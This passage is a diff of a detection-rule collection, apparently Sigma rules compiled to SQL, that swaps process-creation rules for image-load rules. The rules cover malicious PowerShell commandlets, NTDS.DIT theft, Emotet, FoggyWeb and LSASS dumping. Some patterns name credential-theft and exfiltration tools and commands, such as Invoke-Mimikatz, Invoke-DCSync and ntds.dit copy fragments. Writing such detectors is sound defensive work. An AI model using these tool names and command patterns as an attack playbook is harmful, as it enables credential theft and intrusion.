scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - 